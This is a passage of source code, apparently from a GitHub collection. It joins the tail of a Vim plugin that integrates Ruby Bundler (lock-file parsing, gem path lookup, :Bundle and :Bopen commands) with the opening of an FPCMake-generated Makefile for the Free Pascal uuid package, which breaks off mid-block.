b:bundler_gem elseif !empty(getbufvar('#', 'bundler_lock')) let lock = getbufvar('#', 'bundler_lock') for [gem, path] in items(s:project(lock).paths()) if strpart(a:path, 0, len(path)) ==# path let b:bundler_lock = lock let b:bundler_gem = gem break endif endfor endif endif return exists('b:bundler_lock') endfunction function! s:Setup(path) abort if s:Detect(a:path) silent doautocmd User Bundler endif endfunction function! s:ProjectionistDetect() abort if s:Detect(get(g:, 'projectionist_file', '')) && !exists('b:bundler_gem') let dir = fnamemodify(b:bundler_lock, ':h') call projectionist#append(dir, { \ '*': s:filereadable(dir . '/config/environment.rb') ? {} : \ {'console': 'bundle console'}, \ 'Gemfile': {'dispatch': 'bundle --gemfile={file}', 'alternate': 'Gemfile.lock'}, \ 'gems.rb': {'dispatch': 'bundle --gemfile={file}', 'alternate': 'gems.locked'}, \ 'gems.locked': {'alternate': 'gems.rb'}, \ 'Gemfile.lock': {'alternate': 'Gemfile'}}) for projections in bundler#project().projections_list() call projectionist#append(fnamemodify(b:bundler_lock, ':h'), projections) endfor endif endfunction augroup bundler autocmd! autocmd FileType * call s:Setup(expand('<afile>:p')) autocmd BufNewFile,BufReadPost * \ if empty(&filetype) | \ call s:Setup(expand('<afile>:p')) | \ endif autocmd User ProjectionistDetect call s:ProjectionistDetect() autocmd User ProjectionistActivate \ if exists('b:bundler_lock') && !exists(':Bopen') | \ silent doautocmd User Bundler | \ endif augroup END " Section: Project let s:project_prototype = {} let s:projects = {} function! bundler#project(...) abort if !a:0 let lock = !empty(get(b:, 'bundler_lock', '')) ? b:bundler_lock : s:FindBundlerLock(expand('%:p')) elseif s:filereadable(a:1 . '/Gemfile.lock') let lock = a:1 . '/Gemfile.lock' elseif s:filereadable(a:1 . '/gems.locked') let lock = a:1 . '/gems.locked' elseif s:filereadable(a:1) let lock = a:1 else let lock = '' endif if !empty(lock) if has_key(s:projects, lock) let project = get(s:projects, lock) else let project = {'root': fnamemodify(lock, ':h'), '_lock': lock} let s:projects[lock] = project endif return extend(extend(project,s:project_prototype,'keep'),s:abstract_prototype,'keep') endif return {} endfunction function! s:project(...) abort let project = a:0 ? bundler#project(a:1) : bundler#project() if empty(project) call s:throw('not a Bundler project: '.(a:0 ? a:1 : expand('%'))) else return project endif endfunction function! s:project_real(...) dict abort let path = join([self.root]+a:000,'/') let pre = substitute(matchstr(path, '^\a\a\+\ze:'), '^\a', '\u&', 'g') if len(pre) && exists('*' . pre . 'Real') return call(pre . 'Real', [path]) elseif len(pre) && exists('*' . pre . 'Path') return call(pre . 'Path', [path]) else return resolve(path) endif endfunction function! s:project_lock() dict abort return self._lock endfunction function! s:project_manifest() dict abort return substitute(substitute(self._lock, '\.locked$', '.rb', ''), '\.lock$', '', '') endfunction call s:add_methods('project',['real', 'lock', 'manifest']) function! 
s:project_locked() dict abort let lock_file = self.lock() let time = s:fcall('getftime', lock_file) if time != -1 && time != get(self,'_lock_time',-1) let self._locked = {'git': [], 'gem': [], 'path': []} let self._versions = {} let self._dependencies = {} let section = '' let conflict = 0 for line in s:fcall('readfile', lock_file) if line =~# '^[=|]' let conflict = 1 continue elseif line =~# '^>' let conflict = 0 continue elseif line =~# '^<' || conflict continue elseif line =~# '^\S' let section = tr(tolower(line), ' ', '_') let properties = {'versions': {}} if type(get(self._locked, section)) ==# type([]) call extend(self._locked[section], [properties]) endif elseif line =~# '^ \w\+: ' let properties[matchstr(line, '\w\+')] = matchstr(line, ': \zs.*') elseif line =~# '^ [a-zA-Z0-9._-]\+\s\+(\d\+' let name = split(line, ' ')[0] let ver = substitute(line, '.*(\|).*', '', 'g') let properties.versions[name] = ver let self._versions[name] = ver let self._dependencies[name] = [] elseif line =~# '^ [a-zA-Z0-9._-]\+\s\+(' let dep = split(line, ' ')[0] call add(self._dependencies[name], dep) elseif line =~# '^ \S' && !has_key(self._locked, section) let self._locked[section] = line[3:-1] endif endfor let self._lock_time = time endif return get(self, '_locked', {}) endfunction function! s:project_paths(...) dict abort call self.locked() let time = get(self, '_lock_time', -1) if a:0 && a:1 ==# 'refresh' || time != -1 && time != get(self, '_path_time', -1) let paths = {} let chdir = exists("*haslocaldir") && haslocaldir() ? "lchdir" : "chdir" let cwd = getcwd() " Explicitly setting $PATH means /etc/zshenv on OS X can't touch it. if executable('env') let prefix = 'env PATH='.s:shellesc($PATH).' ' else let prefix = '' endif let gem_paths = [] if exists('$GEM_PATH') let gem_paths = split($GEM_PATH, has('win32') ? ';' : ':') endif try exe chdir s:fnameescape(self.real()) if empty(gem_paths) let gem_paths = split(system(prefix.'ruby -rrbconfig -rrubygems -e '.s:shellesc('print(([RbConfig::CONFIG["ruby_version"]] + Gem.path).join(%(;)))')), ';') let abi_version = empty(gem_paths) ? '' : remove(gem_paths, 0) else let abi_version = system(prefix.'ruby -rrbconfig -e '.s:shellesc('print RbConfig::CONFIG["ruby_version"]')) endif exe chdir s:fnameescape(cwd) finally exe chdir s:fnameescape(cwd) endtry for config in [expand('~/.bundle/config'), self.real('.bundle/config')] if filereadable(config) let body = join(readfile(config), "\n") let bundle_path = matchstr(body, "\\C\\<BUNDLE_PATH: [\"']\\=\\zs[^\n'\"]*") if !empty(bundle_path) let gem_paths = [self.real(bundle_path, 'ruby', abi_version), self.real(bundle_path)] endif endif endfor call map(gem_paths, 'resolve(v:val)') for source in self._locked.git let basename = matchstr(source.remote, '.*/\zs.\{-\}\ze\%(\.git\)\=$') . \ '-' . source.revision[0:11] for [name, ver] in items(source.versions) for path in map(copy(gem_paths), 'v:val . "/bundler/gems"') + \ [expand('~/.bundle/ruby/') . abi_version] let dir = path . '/' . basename if isdirectory(dir) let files = split(glob(dir . '/*/' . name . '.gemspec'), "\n") if empty(files) let paths[name] = dir else let paths[name] = files[0][0 : -10-strlen(name)] endif break endif endfor endfor endfor for source in self._locked.path for [name, ver] in items(source.versions) if source.remote =~# '^\~/' let local = expand(source.remote) elseif source.remote !~# '^/' let local = simplify(self.real(source.remote)) else let local = source.remote endif let files = split(glob(local . '/*/' . name . 
'.gemspec'), "\n") if empty(files) let paths[name] = local else let paths[name] = files[0][0 : -10-strlen(name)] endif endfor endfor for source in self._locked.gem for [name, ver] in items(source.versions) for path in gem_paths let dir = path . '/gems/' . name . '-' . ver if isdirectory(dir) let paths[name] = dir break endif endfor if !has_key(paths, name) for path in gem_paths let dir = glob(path . '/gems/' . name . '-' . ver . '-*') if isdirectory(dir) let paths[name] = dir break endif endfor endif endfor endfor if has_key(self, '_projections_list') call remove(self, '_projections_list') endif let self._path_time = time let self._paths = paths let self._sorted = sort(values(paths)) let index = index(self._sorted, fnamemodify(self.lock(), ':h')) if index > 0 call insert(self._sorted, remove(self._sorted,index)) endif if len(self._sorted) > 1 && filereadable(self._sorted[1] . '/lib/tags') && \ !filereadable(self._sorted[1] . '/tags') let self._tags = 'lib/tags' endif call self.alter_buffer_paths() return paths endif return get(self,'_paths',{}) endfunction function! s:project_sorted() dict abort call self.paths() return get(self, '_sorted', []) endfunction function! s:project_tags() dict abort call self.paths() return get(self, '_tags', []) endfunction function! s:project_gems() dict abort return self.paths() endfunction function! s:project_versions() dict abort call self.locked() return get(self, '_versions', {}) endfunction function! s:project_has(gem) dict abort call self.locked() return has_key(self.versions(), a:gem) endfunction function! s:project_projections_list() dict abort call self.paths() if !has_key(self, '_projections_list') let self._projections_list = [] let list = self._projections_list if !empty(get(g:, 'gem_projections', {})) for name in keys(self.versions()) if has_key(g:gem_projections, name) call add(list, g:gem_projections[name]) endif endfor endif for path in self.sorted() if filereadable(path . '/lib/projections.json') call add(list, projectionist#json_parse(readfile(path . '/lib/projections.json'))) endif endfor endif return self._projections_list endfunction function! s:project_dependencies(gem, ...) dict abort let deps = a:0 ? a:1 : {} let paths = a:0 > 1 ? a:2 : self.paths() for dep in get(self._dependencies, a:gem, []) if !has_key(deps, dep) && has_key(paths, dep) let deps[dep] = paths[dep] call self.dependencies(dep, deps, paths) endif endfor return deps endfunction call s:add_methods('project', ['locked', 'gems', 'paths', 'sorted', 'versions', 'has', 'dependencies', 'projections_list']) " Section: Buffer let s:buffer_prototype = {} function! s:buffer(...) abort let buffer = {'#': bufnr(a:0 ? a:1 : '%')} call extend(extend(buffer,s:buffer_prototype,'keep'),s:abstract_prototype,'keep') if !empty(buffer.getvar('bundler_lock')) return buffer endif call s:throw('not a Bundler project: '.(a:0 ? a:1 : expand('%'))) endfunction function! bundler#buffer(...) abort return s:buffer(a:0 ? a:1 : '%') endfunction function! s:buffer_getvar(var) dict abort return getbufvar(self['#'],a:var) endfunction function! s:buffer_setvar(var,value) dict abort return setbufvar(self['#'],a:var,a:value) endfunction function! s:buffer_project() dict abort return s:project(self.getvar('bundler_lock')) endfunction call s:add_methods('buffer',['getvar','setvar','project']) " Section: Bundle function! s:push_chdir() abort if !exists("s:command_stack") | let s:command_stack = [] | endif let chdir = exists("*haslocaldir") && haslocaldir() ? 
"lchdir " : "chdir " call add(s:command_stack,chdir.s:fnameescape(getcwd())) exe chdir.'`=s:project().real()`' endfunction function! s:pop_command() abort if exists("s:command_stack") && len(s:command_stack) > 0 exe remove(s:command_stack,-1) endif endfunction function! s:Bundle(bang,arg) abort let old_makeprg = &l:makeprg let old_errorformat = &l:errorformat let old_compiler = get(b:, 'current_compiler', '') let cd = exists('*haslocaldir') && haslocaldir() ? 'lcd' : 'cd' let cwd = getcwd() try execute cd fnameescape(s:project().real()) if a:arg =~# '^\s*console\>' let arg = substitute(a:arg, '^\s*console\s*', '', '') if exists(':Start') > 1 execute 'Start'.a:bang '-title=' . \ escape(fnamemodify(s:project().real(), ':t'), ' ') . \ '\ console bundle console' arg else execute '!bundle console' arg endif else compiler bundler execute 'make! '.a:arg if a:bang ==# '' return 'if !empty(getqflist()) | cfirst | endif' else return '' endif endif finally let &l:errorformat = old_errorformat let &l:makeprg = old_makeprg let b:current_compiler = old_compiler if empty(b:current_compiler) unlet b:current_compiler endif execute cd fnameescape(cwd) endtry endfunction function! s:BundleComplete(A, L, P) abort return bundler#complete(a:A, a:L, a:P, bundler#project()) endfunction function! bundler#complete(A, L, P, ...) abort let project = a:0 ? a:1 : bundler#project(getcwd()) if !empty(project) && a:L =~# '\s\+\%(show\|update\) ' return s:completion_filter(keys(project.paths()), a:A) endif return s:completion_filter(['install','update','exec','package','config','check','list','show','outdated','console','viz','benchmark'], a:A) endfunction call s:command("-bar -bang -nargs=? -complete=customlist,s:BundleComplete Bundle :execute s:Bundle('<bang>',<q-args>)") function! s:IsBundlerMake() abort return &makeprg =~# '^bundle' && exists('b:bundler_lock') endfunction function! s:QuickFixCmdPreMake() abort if !s:IsBundlerMake() return endif call s:push_chdir() endfunction function! s:QuickFixCmdPostMake() abort if !s:IsBundlerMake() return endif call s:pop_command() call s:project().paths('refresh') endfunction augroup bundler_command autocmd QuickFixCmdPre *make* call s:QuickFixCmdPreMake() autocmd QuickFixCmdPost *make* call s:QuickFixCmdPostMake() autocmd User Bundler \ if exists(':Console') < 2 | \ exe "command! -buffer -bar -bang -nargs=* Console :Bundle<bang> console <args>" | \ endif augroup END " Section: Bopen function! s:Open(cmd,gem,lcd) abort if a:gem ==# '' && a:lcd return a:cmd.' '.fnameescape(s:project().manifest()) elseif a:gem ==# '' return a:cmd.' '.fnameescape(s:project().lock()) else if !has_key(s:project().paths(), a:gem) call s:project().paths('refresh') endif if !has_key(s:project().paths(), a:gem) if has_key(s:project().versions(), a:gem) let v:errmsg = "Gem \"".a:gem."\" is in bundle but not installed" else let v:errmsg = "Gem \"".a:gem."\" is not in bundle" endif return 'echoerr v:errmsg' endif let path = fnameescape(s:project().paths()[a:gem]) let exec = a:cmd.' '.path if a:cmd =~# '^pedit' && a:lcd let exec .= '|wincmd P|lcd '.path.'|wincmd p' elseif a:lcd let exec .= '|lcd '.path endif return exec endif endfunction function! s:OpenComplete(A,L,P) abort return s:completion_filter(keys(s:project().paths()),a:A) endfunction call s:command("-bar -bang -nargs=? -complete=customlist,s:OpenComplete Bopen :execute s:Open('edit<bang>',<q-args>,1)") call s:command("-bar -bang -nargs=? 
-complete=customlist,s:OpenComplete Bedit :execute s:Open('edit<bang>',<q-args>,0)") call s:command("-bar -bang -nargs=? -complete=customlist,s:OpenComplete Bsplit :execute s:Open('split',<q-args>,<bang>1)") call s:command("-bar -bang -nargs=? -complete=customlist,s:OpenComplete Bvsplit :execute s:Open('vsplit',<q-args>,<bang>1)") call s:command("-bar -bang -nargs=? -complete=customlist,s:OpenComplete Btabedit :execute s:Open('tabedit',<q-args>,<bang>1)") call s:command("-bar -bang -nargs=? -complete=customlist,s:OpenComplete Bpedit :execute s:Open('pedit',<q-args>,<bang>1)") " Section: Paths function! s:build_path_option(paths,suffix) abort return join(map(copy(a:paths),'",".escape(s:shellslash(v:val."/".a:suffix),", ")'),'') endfunction function! s:buffer_alter_paths() dict abort if self.getvar('&suffixesadd') =~# '\.rb\>' let gem = self.getvar('bundler_gem') if empty(gem) let new = self.project().sorted() else let new = sort(values(self.project().dependencies(gem))) endif let old = type(self.getvar('bundler_paths')) == type([]) ? self.getvar('bundler_paths') : [] for [option, suffix] in \ [['tags', get(self.project(), '_tags', 'tags')], ['path', 'lib']] let value = self.getvar('&'.option) if !empty(old) let drop = s:build_path_option(old,suffix) let index = stridx(value,drop) if index > 0 let value = value[0:index-1] . value[index+strlen(drop):-1] endif endif call self.setvar('&'.option,value.s:build_path_option(new,suffix)) endfor call self.setvar('bundler_paths',new) endif endfunction call s:add_methods('buffer',['alter_paths']) function! s:project_alter_buffer_paths() dict abort for bufnr in range(1,bufnr('$')) if getbufvar(bufnr,'bundler_lock') ==# self.lock() let vim_parsing_quirk = s:buffer(bufnr).alter_paths() endif if getbufvar(bufnr, '&syntax') ==# 'gemfilelock' call setbufvar(bufnr, '&syntax', 'gemfilelock') endif endfor endfunction call s:add_methods('project',['alter_buffer_paths']) augroup bundler_path autocmd! autocmd User Bundler call s:buffer().alter_paths() augroup END " vim:set sw=2 sts=2:
{ "pile_set_name": "Github" }
# # Don't edit, this file is generated by FPCMake Version 2.0.0 # default: all MAKEFILETARGETS=i386-linux i386-go32v2 i386-win32 i386-os2 i386-freebsd i386-beos i386-haiku i386-netbsd i386-solaris i386-netware i386-openbsd i386-wdosx i386-darwin i386-emx i386-watcom i386-netwlibc i386-wince i386-embedded i386-symbian i386-nativent i386-iphonesim i386-android i386-aros m68k-linux m68k-netbsd m68k-amiga m68k-atari m68k-palmos m68k-macosclassic m68k-embedded powerpc-linux powerpc-netbsd powerpc-amiga powerpc-macosclassic powerpc-darwin powerpc-morphos powerpc-embedded powerpc-wii powerpc-aix sparc-linux sparc-netbsd sparc-solaris sparc-embedded x86_64-linux x86_64-freebsd x86_64-haiku x86_64-netbsd x86_64-solaris x86_64-openbsd x86_64-darwin x86_64-win64 x86_64-embedded x86_64-iphonesim x86_64-android x86_64-aros x86_64-dragonfly arm-linux arm-netbsd arm-palmos arm-wince arm-gba arm-nds arm-embedded arm-symbian arm-android arm-aros arm-freertos arm-ios powerpc64-linux powerpc64-darwin powerpc64-embedded powerpc64-aix avr-embedded armeb-linux armeb-embedded mips-linux mipsel-linux mipsel-embedded mipsel-android mips64el-linux jvm-java jvm-android i8086-embedded i8086-msdos i8086-win16 aarch64-linux aarch64-darwin aarch64-win64 aarch64-android aarch64-ios wasm-wasm sparc64-linux riscv32-linux riscv32-embedded riscv64-linux riscv64-embedded xtensa-linux xtensa-embedded xtensa-freertos z80-embedded z80-zxspectrum z80-msxdos BSDs = freebsd netbsd openbsd darwin dragonfly UNIXs = linux $(BSDs) solaris qnx haiku aix LIMIT83fs = go32v2 os2 emx watcom msdos win16 atari OSNeedsComspecToRunBatch = go32v2 watcom FORCE: .PHONY: FORCE override PATH:=$(patsubst %/,%,$(subst \,/,$(PATH))) ifneq ($(findstring darwin,$(OSTYPE)),) inUnix=1 #darwin SEARCHPATH:=$(filter-out .,$(subst :, ,$(PATH))) else ifeq ($(findstring ;,$(PATH)),) inUnix=1 SEARCHPATH:=$(filter-out .,$(subst :, ,$(PATH))) else SEARCHPATH:=$(subst ;, ,$(PATH)) endif endif SEARCHPATH+=$(patsubst %/,%,$(subst \,/,$(dir $(MAKE)))) PWD:=$(strip $(wildcard $(addsuffix /pwd.exe,$(SEARCHPATH)))) ifeq ($(PWD),) PWD:=$(strip $(wildcard $(addsuffix /pwd,$(SEARCHPATH)))) ifeq ($(PWD),) $(error You need the GNU utils package to use this Makefile) else PWD:=$(firstword $(PWD)) SRCEXEEXT= endif else PWD:=$(firstword $(PWD)) SRCEXEEXT=.exe endif ifndef inUnix ifeq ($(OS),Windows_NT) inWinNT=1 else ifdef OS2_SHELL inOS2=1 endif endif else ifneq ($(findstring cygdrive,$(PATH)),) inCygWin=1 endif endif ifdef inUnix SRCBATCHEXT=.sh else ifdef inOS2 SRCBATCHEXT=.cmd else SRCBATCHEXT=.bat endif endif ifdef COMSPEC ifneq ($(findstring $(OS_SOURCE),$(OSNeedsComspecToRunBatch)),) ifndef RUNBATCH RUNBATCH=$(COMSPEC) /C endif endif endif ifdef inUnix PATHSEP=/ else PATHSEP:=$(subst /,\,/) ifdef inCygWin PATHSEP=/ endif endif ifdef PWD BASEDIR:=$(subst \,/,$(shell $(PWD))) ifdef inCygWin ifneq ($(findstring /cygdrive/,$(BASEDIR)),) BASENODIR:=$(patsubst /cygdrive%,%,$(BASEDIR)) BASEDRIVE:=$(firstword $(subst /, ,$(BASENODIR))) BASEDIR:=$(subst /cygdrive/$(BASEDRIVE)/,$(BASEDRIVE):/,$(BASEDIR)) endif endif else BASEDIR=. endif ifdef inOS2 ifndef ECHO ECHO:=$(strip $(wildcard $(addsuffix /gecho$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(ECHO),) ECHO:=$(strip $(wildcard $(addsuffix /echo$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(ECHO),) ECHO=echo else ECHO:=$(firstword $(ECHO)) endif else ECHO:=$(firstword $(ECHO)) endif endif export ECHO endif override DEFAULT_FPCDIR=../.. 
ifndef FPC ifdef PP FPC=$(PP) endif endif ifndef FPC FPCPROG:=$(strip $(wildcard $(addsuffix /fpc$(SRCEXEEXT),$(SEARCHPATH)))) ifneq ($(FPCPROG),) FPCPROG:=$(firstword $(FPCPROG)) ifneq ($(CPU_TARGET),) FPC:=$(shell $(FPCPROG) -P$(CPU_TARGET) -PB) else FPC:=$(shell $(FPCPROG) -PB) endif ifneq ($(findstring Error,$(FPC)),) override FPC=$(firstword $(strip $(wildcard $(addsuffix /ppc386$(SRCEXEEXT),$(SEARCHPATH))))) else ifeq ($(strip $(wildcard $(FPC))),) FPC:=$(firstword $(FPCPROG)) endif endif else override FPC=$(firstword $(strip $(wildcard $(addsuffix /ppc386$(SRCEXEEXT),$(SEARCHPATH))))) endif endif override FPC:=$(subst $(SRCEXEEXT),,$(FPC)) override FPC:=$(subst \,/,$(FPC))$(SRCEXEEXT) FOUNDFPC:=$(strip $(wildcard $(FPC))) ifeq ($(FOUNDFPC),) FOUNDFPC=$(strip $(wildcard $(addsuffix /$(FPC),$(SEARCHPATH)))) ifeq ($(FOUNDFPC),) $(error Compiler $(FPC) not found) endif endif ifndef FPC_COMPILERINFO FPC_COMPILERINFO:=$(shell $(FPC) -iVSPTPSOTO) endif ifndef FPC_VERSION FPC_VERSION:=$(word 1,$(FPC_COMPILERINFO)) endif export FPC FPC_VERSION FPC_COMPILERINFO unexport CHECKDEPEND ALLDEPENDENCIES ifndef CPU_TARGET ifdef CPU_TARGET_DEFAULT CPU_TARGET=$(CPU_TARGET_DEFAULT) endif endif ifndef OS_TARGET ifdef OS_TARGET_DEFAULT OS_TARGET=$(OS_TARGET_DEFAULT) endif endif ifndef CPU_SOURCE CPU_SOURCE:=$(word 2,$(FPC_COMPILERINFO)) endif ifndef CPU_TARGET CPU_TARGET:=$(word 3,$(FPC_COMPILERINFO)) endif ifndef OS_SOURCE OS_SOURCE:=$(word 4,$(FPC_COMPILERINFO)) endif ifndef OS_TARGET OS_TARGET:=$(word 5,$(FPC_COMPILERINFO)) endif FULL_TARGET=$(CPU_TARGET)-$(OS_TARGET) FULL_SOURCE=$(CPU_SOURCE)-$(OS_SOURCE) ifeq ($(CPU_TARGET),armeb) ARCH=arm override FPCOPT+=-Cb else ifeq ($(CPU_TARGET),armel) ARCH=arm override FPCOPT+=-CaEABI else ARCH=$(CPU_TARGET) endif endif ifeq ($(FULL_TARGET),arm-embedded) ifeq ($(SUBARCH),) $(error When compiling for arm-embedded, a sub-architecture (e.g. SUBARCH=armv4t or SUBARCH=armv7m) must be defined) endif override FPCOPT+=-Cp$(SUBARCH) endif ifeq ($(FULL_TARGET),avr-embedded) ifeq ($(SUBARCH),) $(error When compiling for avr-embedded, a sub-architecture (e.g. SUBARCH=avr25 or SUBARCH=avr35) must be defined) endif override FPCOPT+=-Cp$(SUBARCH) endif ifeq ($(FULL_TARGET),mipsel-embedded) ifeq ($(SUBARCH),) $(error When compiling for mipsel-embedded, a sub-architecture (e.g. SUBARCH=pic32mx) must be defined) endif override FPCOPT+=-Cp$(SUBARCH) endif ifeq ($(FULL_TARGET),xtensa-embedded) ifeq ($(SUBARCH),) $(error When compiling for xtensa-embedded, a sub-architecture (e.g. SUBARCH=lx106 or SUBARCH=lx6) must be defined) endif override FPCOPT+=-Cp$(SUBARCH) endif ifeq ($(FULL_TARGET),xtensa-freertos) ifeq ($(SUBARCH),) $(error When compiling for xtensa-freertos, a sub-architecture (e.g. SUBARCH=lx106 or SUBARCH=lx6) must be defined) endif override FPCOPT+=-Cp$(SUBARCH) endif ifeq ($(FULL_TARGET),arm-freertos) ifeq ($(SUBARCH),) $(error When compiling for arm-freertos, a sub-architecture (e.g. 
SUBARCH=armv6m or SUBARCH=armv7em) must be defined) endif override FPCOPT+=-Cp$(SUBARCH) endif ifneq ($(findstring $(OS_SOURCE),$(LIMIT83fs)),) TARGETSUFFIX=$(OS_TARGET) SOURCESUFFIX=$(OS_SOURCE) else ifneq ($(findstring $(OS_TARGET),$(LIMIT83fs)),) TARGETSUFFIX=$(OS_TARGET) else TARGETSUFFIX=$(FULL_TARGET) endif SOURCESUFFIX=$(FULL_SOURCE) endif ifneq ($(FULL_TARGET),$(FULL_SOURCE)) CROSSCOMPILE=1 endif ifeq ($(findstring makefile,$(MAKECMDGOALS)),) ifeq ($(findstring $(FULL_TARGET),$(MAKEFILETARGETS)),) $(error The Makefile doesn't support target $(FULL_TARGET), please run fpcmake first) endif endif ifneq ($(findstring $(OS_TARGET),$(BSDs)),) BSDhier=1 endif ifeq ($(OS_TARGET),linux) linuxHier=1 endif ifndef CROSSCOMPILE BUILDFULLNATIVE=1 export BUILDFULLNATIVE endif ifdef BUILDFULLNATIVE BUILDNATIVE=1 export BUILDNATIVE endif export OS_TARGET OS_SOURCE ARCH CPU_TARGET CPU_SOURCE FULL_TARGET FULL_SOURCE TARGETSUFFIX SOURCESUFFIX CROSSCOMPILE ifdef FPCDIR override FPCDIR:=$(subst \,/,$(FPCDIR)) ifeq ($(wildcard $(addprefix $(FPCDIR)/,rtl)),) override FPCDIR=wrong endif else override FPCDIR=wrong endif ifdef DEFAULT_FPCDIR ifeq ($(FPCDIR),wrong) override FPCDIR:=$(subst \,/,$(DEFAULT_FPCDIR)) ifeq ($(wildcard $(addprefix $(FPCDIR)/,rtl)),) override FPCDIR=wrong endif endif endif ifeq ($(FPCDIR),wrong) ifdef inUnix override FPCDIR=/usr/local/lib/fpc/$(FPC_VERSION) ifeq ($(wildcard $(FPCDIR)/units),) override FPCDIR=/usr/lib/fpc/$(FPC_VERSION) endif else override FPCDIR:=$(subst /$(FPC),,$(firstword $(strip $(wildcard $(addsuffix /$(FPC),$(SEARCHPATH)))))) override FPCDIR:=$(FPCDIR)/.. ifeq ($(wildcard $(addprefix $(FPCDIR)/,rtl)),) override FPCDIR:=$(FPCDIR)/.. ifeq ($(wildcard $(addprefix $(FPCDIR)/,rtl)),) override FPCDIR:=$(BASEDIR) ifeq ($(wildcard $(addprefix $(FPCDIR)/,rtl)),) override FPCDIR=c:/pp endif endif endif endif endif ifndef CROSSBINDIR CROSSBINDIR:=$(wildcard $(FPCDIR)/bin/$(TARGETSUFFIX)) endif ifneq ($(findstring $(OS_TARGET),darwin iphonesim ios),) ifneq ($(findstring $(OS_SOURCE),darwin ios),) DARWIN2DARWIN=1 endif endif ifndef BINUTILSPREFIX ifndef CROSSBINDIR ifdef CROSSCOMPILE ifneq ($(OS_TARGET),msdos) ifndef DARWIN2DARWIN ifneq ($(CPU_TARGET),jvm) BINUTILSPREFIX=$(CPU_TARGET)-$(OS_TARGET)- ifeq ($(OS_TARGET),android) ifeq ($(CPU_TARGET),arm) BINUTILSPREFIX=arm-linux-androideabi- else ifeq ($(CPU_TARGET),i386) BINUTILSPREFIX=i686-linux-android- else BINUTILSPREFIX=$(CPU_TARGET)-linux-android- endif endif endif endif endif else BINUTILSPREFIX=$(OS_TARGET)- endif endif endif endif UNITSDIR:=$(wildcard $(FPCDIR)/units/$(TARGETSUFFIX)) ifeq ($(UNITSDIR),) UNITSDIR:=$(wildcard $(FPCDIR)/units/$(OS_TARGET)) endif PACKAGESDIR:=$(wildcard $(FPCDIR) $(FPCDIR)/packages) ifndef FPCFPMAKE ifdef CROSSCOMPILE ifeq ($(strip $(wildcard $(addsuffix /compiler/ppc$(SRCEXEEXT),$(FPCDIR)))),) FPCPROG:=$(strip $(wildcard $(addsuffix /fpc$(SRCEXEEXT),$(SEARCHPATH)))) ifneq ($(FPCPROG),) FPCPROG:=$(firstword $(FPCPROG)) FPCFPMAKE:=$(shell $(FPCPROG) -PB) ifeq ($(strip $(wildcard $(FPCFPMAKE))),) FPCFPMAKE:=$(firstword $(FPCPROG)) endif else override FPCFPMAKE=$(firstword $(strip $(wildcard $(addsuffix /ppc386$(SRCEXEEXT),$(SEARCHPATH))))) endif else FPCFPMAKE=$(strip $(wildcard $(addsuffix /compiler/ppc$(SRCEXEEXT),$(FPCDIR)))) FPMAKE_SKIP_CONFIG=-n export FPCFPMAKE export FPMAKE_SKIP_CONFIG endif else FPMAKE_SKIP_CONFIG=-n FPCFPMAKE=$(FPC) endif endif override PACKAGE_NAME=uuid override PACKAGE_VERSION=3.3.1 FPMAKE_BIN_CLEAN=$(wildcard ./fpmake$(SRCEXEEXT)) ifdef OS_TARGET 
FPC_TARGETOPT+=--os=$(OS_TARGET) endif ifdef CPU_TARGET FPC_TARGETOPT+=--cpu=$(CPU_TARGET) endif LOCALFPMAKE=./fpmake$(SRCEXEEXT) override INSTALL_FPCPACKAGE=y ifdef REQUIRE_UNITSDIR override UNITSDIR+=$(REQUIRE_UNITSDIR) endif ifdef REQUIRE_PACKAGESDIR override PACKAGESDIR+=$(REQUIRE_PACKAGESDIR) endif ifdef ZIPINSTALL ifneq ($(findstring $(OS_TARGET),$(UNIXs)),) UNIXHier=1 endif else ifneq ($(findstring $(OS_SOURCE),$(UNIXs)),) UNIXHier=1 endif endif ifndef INSTALL_PREFIX ifdef PREFIX INSTALL_PREFIX=$(PREFIX) endif endif ifndef INSTALL_PREFIX ifdef UNIXHier INSTALL_PREFIX=/usr/local else ifdef INSTALL_FPCPACKAGE INSTALL_BASEDIR:=/pp else INSTALL_BASEDIR:=/$(PACKAGE_NAME) endif endif endif export INSTALL_PREFIX ifdef INSTALL_FPCSUBDIR export INSTALL_FPCSUBDIR endif ifndef DIST_DESTDIR DIST_DESTDIR:=$(BASEDIR) endif export DIST_DESTDIR ifndef COMPILER_UNITTARGETDIR ifdef PACKAGEDIR_MAIN COMPILER_UNITTARGETDIR=$(PACKAGEDIR_MAIN)/units/$(TARGETSUFFIX) else COMPILER_UNITTARGETDIR=units/$(TARGETSUFFIX) endif endif ifndef COMPILER_TARGETDIR COMPILER_TARGETDIR=. endif ifndef INSTALL_BASEDIR ifdef UNIXHier ifdef INSTALL_FPCPACKAGE INSTALL_BASEDIR:=$(INSTALL_PREFIX)/lib/fpc/$(FPC_VERSION) else INSTALL_BASEDIR:=$(INSTALL_PREFIX)/lib/$(PACKAGE_NAME) endif else INSTALL_BASEDIR:=$(INSTALL_PREFIX) endif endif ifndef INSTALL_BINDIR ifdef UNIXHier INSTALL_BINDIR:=$(INSTALL_PREFIX)/bin else INSTALL_BINDIR:=$(INSTALL_BASEDIR)/bin ifdef INSTALL_FPCPACKAGE ifdef CROSSCOMPILE ifdef CROSSINSTALL INSTALL_BINDIR:=$(INSTALL_BINDIR)/$(SOURCESUFFIX) else INSTALL_BINDIR:=$(INSTALL_BINDIR)/$(TARGETSUFFIX) endif else INSTALL_BINDIR:=$(INSTALL_BINDIR)/$(TARGETSUFFIX) endif endif endif endif ifndef INSTALL_UNITDIR INSTALL_UNITDIR:=$(INSTALL_BASEDIR)/units/$(TARGETSUFFIX) ifdef INSTALL_FPCPACKAGE ifdef PACKAGE_NAME INSTALL_UNITDIR:=$(INSTALL_UNITDIR)/$(PACKAGE_NAME) endif endif endif ifndef INSTALL_LIBDIR ifdef UNIXHier INSTALL_LIBDIR:=$(INSTALL_PREFIX)/lib else INSTALL_LIBDIR:=$(INSTALL_UNITDIR) endif endif ifndef INSTALL_SOURCEDIR ifdef UNIXHier ifdef BSDhier SRCPREFIXDIR=share/src else ifdef linuxHier SRCPREFIXDIR=share/src else SRCPREFIXDIR=src endif endif ifdef INSTALL_FPCPACKAGE ifdef INSTALL_FPCSUBDIR INSTALL_SOURCEDIR:=$(INSTALL_PREFIX)/$(SRCPREFIXDIR)/fpc-$(FPC_VERSION)/$(INSTALL_FPCSUBDIR)/$(PACKAGE_NAME) else 